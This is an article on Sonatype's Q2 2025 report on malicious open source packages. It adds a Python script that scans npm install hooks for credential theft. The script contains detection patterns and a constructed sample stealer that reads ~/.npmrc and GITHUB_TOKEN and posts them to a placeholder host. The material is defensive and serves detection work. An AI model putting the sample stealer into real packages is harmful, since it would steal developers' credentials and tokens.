Open source has a malware problem, and it’s getting worse
Sonatype, a software security vendor, has published its Q2 2025 Open Source Malware Index, and the trend it describes is not a good one. The index reports 16,279 malicious open source packages identified in the quarter across ecosystems including npm and PyPI, bringing the total number of malware packages the company has catalogued to 845,204.
The concern is not only volume. The report also describes attacks of growing sophistication and scale aimed at developers, software teams, and Continuous Integration/Continuous Deployment (CI/CD) pipelines. According to Brian Fox, CTO of Sonatype, "Attackers are no longer simply experimenting with open source. The numbers are telling us that threat actors have identified data as the most profitable target, and developers as the easiest way in."
These threats increasingly hide in plain sight inside everyday tools and dependencies, which makes them a direct risk to any organization that builds on these ecosystems, and means developers and security teams have to treat dependency intake as a security boundary rather than a convenience.
Data theft continues to be the most common goal behind malicious open source packages
In the second quarter of 2025, 55% of the threats found were built to steal sensitive information: secrets, passwords, access tokens, API keys, and personal data. The report counts 4,400 packages created specifically for this purpose.
These packages target the tools developers use every day, where a single stolen credential, such as a registry token, a cloud key or a CI secret, can unlock far more than the machine it was taken from. Because the payload arrives as an ordinary dependency and runs with the privileges of the developer or build agent that installed it, the theft is easy to miss until the credential is used elsewhere.
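One place this class of package is visible is the manifest: npm runs `preinstall`, `install` and `postinstall` scripts automatically when a dependency is installed, so a stealer does not need the package to be imported at all. The following triage script is an added example, not Sonatype's detection logic or any npm tooling. It reads a package's `package.json` plus any script files the install hooks launch, and flags hooks that combine a credential source (token-like environment variables, `~/.npmrc`, `~/.aws/credentials`, `~/.ssh`) with an outbound network call. The regex patterns, the severity scheme, and both sample packages (`color-utilz`, `fast-hash`, the host `example.invalid`) are constructed for illustration.

```python
"""Heuristic triage of an npm package for install-time credential theft.

Added example, not Sonatype's or npm's own tooling. Patterns and the two
sample packages below are constructed assumptions for illustration only.
"""
from __future__ import annotations

import json
import re
from dataclasses import dataclass, field

# Hooks npm runs automatically when a dependency is installed; no import needed.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")

CREDENTIAL_PATTERNS = [re.compile(p) for p in (
    r"process\.env\.\w*(TOKEN|SECRET|KEY|PASSWORD|PASS)\w*",   # Node env access
    r"\$\{?\w*(TOKEN|SECRET|KEY|PASSWORD|PASS)\w*\}?",         # shell expansion
    r"\.npmrc", r"\.aws/credentials", r"\.ssh/", r"\.git-credentials",
    r"\.docker/config\.json", r"\.kube/config",
)]

EXFIL_PATTERNS = [re.compile(p) for p in (
    r"\bcurl\b", r"\bwget\b", r"\bfetch\(", r"https?://",
    r"require\(['\"]https?['\"]\)", r"https?\.request\(", r"dns\.(resolve|lookup)",
)]

# `node foo.js` / `node ./scripts/foo.js` inside a hook: follow into that file.
NODE_SCRIPT_REF = re.compile(r"\bnode\s+(\S+\.[cm]?js)\b")


@dataclass
class Finding:
    hook: str
    command: str
    credential_hits: list[str] = field(default_factory=list)
    exfil_hits: list[str] = field(default_factory=list)

    @property
    def severity(self) -> str:
        if self.credential_hits and self.exfil_hits:
            return "high"    # reads a secret and talks to the network at install time
        if self.credential_hits or self.exfil_hits:
            return "medium"
        return "low"         # lifecycle hook present, nothing suspicious inside it


def _normalise(path: str) -> str:
    return path[2:] if path.startswith("./") else path


def scan_package(files: dict[str, str]) -> list[Finding]:
    """files maps relative path -> content and must contain 'package.json'."""
    manifest = json.loads(files["package.json"])
    scripts = manifest.get("scripts") or {}
    findings: list[Finding] = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        # Inspect the hook command itself plus every script file it launches.
        bodies = [cmd] + [files.get(_normalise(m), "") for m in NODE_SCRIPT_REF.findall(cmd)]
        text = "\n".join(bodies)
        cred = [p.pattern for p in CREDENTIAL_PATTERNS if p.search(text)]
        exf = [p.pattern for p in EXFIL_PATTERNS if p.search(text)]
        findings.append(Finding(hook, cmd, cred, exf))
    return findings


SEVERITY_ORDER = {"none": 0, "low": 1, "medium": 2, "high": 3}


def triage(files: dict[str, str]) -> str:
    """Overall verdict: the highest severity across all lifecycle hooks."""
    return max((f.severity for f in scan_package(files)),
               key=SEVERITY_ORDER.__getitem__, default="none")


# Constructed sample: a stealer disguised as a postinstall setup step.
STEALER = {
    "package.json": json.dumps({"name": "color-utilz", "version": "1.0.3",
                                "scripts": {"postinstall": "node ./setup.js"}}),
    "setup.js": """
const fs = require('fs'), os = require('os'), https = require('https');
const loot = {
  npmrc: fs.readFileSync(os.homedir() + '/.npmrc', 'utf8'),
  gh: process.env.GITHUB_TOKEN,
};
https.request({ hostname: 'example.invalid', method: 'POST', path: '/c' })
     .end(JSON.stringify(loot));
""",
}

# Constructed sample: a native addon that legitimately compiles on install.
BENIGN = {
    "package.json": json.dumps({"name": "fast-hash", "version": "2.1.0",
                                "scripts": {"install": "node-gyp rebuild", "test": "mocha"}}),
}

if __name__ == "__main__":
    for name, pkg in (("stealer", STEALER), ("benign", BENIGN)):
        print(name, triage(pkg))
        for f in scan_package(pkg):
            print(f"  {f.hook}: {f.severity} cred={f.credential_hits} exfil={f.exfil_hits}")
```

This is a triage aid, not a detector: an obfuscated or string-split stealer will not match any of these patterns, and a `high` verdict still needs a human to read the script. The blanket mitigation for the whole class is to stop install hooks from running at all in CI (`npm ci --ignore-scripts`, or `npm config set ignore-scripts true`) and to allow-list the few packages, such as native addons, that genuinely need them.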
Data corruption attacks are becoming more common
Researchers have also identified a sharp increase in malware designed to damage or interfere with data. These types of threats doubled from the previous quarter and now make up just over 3% of all malicious packages, with more than 400 identified in Q2.
These packages are built to corrupt files, inject harmful code, or otherwise disrupt software and infrastructure. Unlike a stealer, they do visible damage rather than quietly collecting data, but a package that runs inside a build pipeline can still affect every system that pipeline feeds before anyone traces the fault to a dependency.
Cryptomining malware is slightly less common
Malware that hijacks systems to mine cryptocurrency made up about 5% of the malicious packages found in Q2, a small drop from earlier in the year.
The shift may mean attackers are prioritising stolen credentials and deeper access to systems over simply consuming compute.
Well-known threat groups are using open source at scale
Researchers linked 107 malicious packages to the Lazarus Group, a hacking group attributed to the North Korean government. Those packages had more than 30,000 known downloads.
The findings show that advanced threat groups are using open source ecosystems to carry out espionage, financial crime, and other long-term operations, so the threat is not limited to opportunistic criminals. Defenders need to assume that a well-resourced actor can get a package in front of their developers.
The growing volume of malware in open source packages demands attention from developers, security teams, and the organizations that depend on these ecosystems. Understanding how these packages operate, and treating what enters a build as untrusted until it has been checked, is the precaution the numbers call for.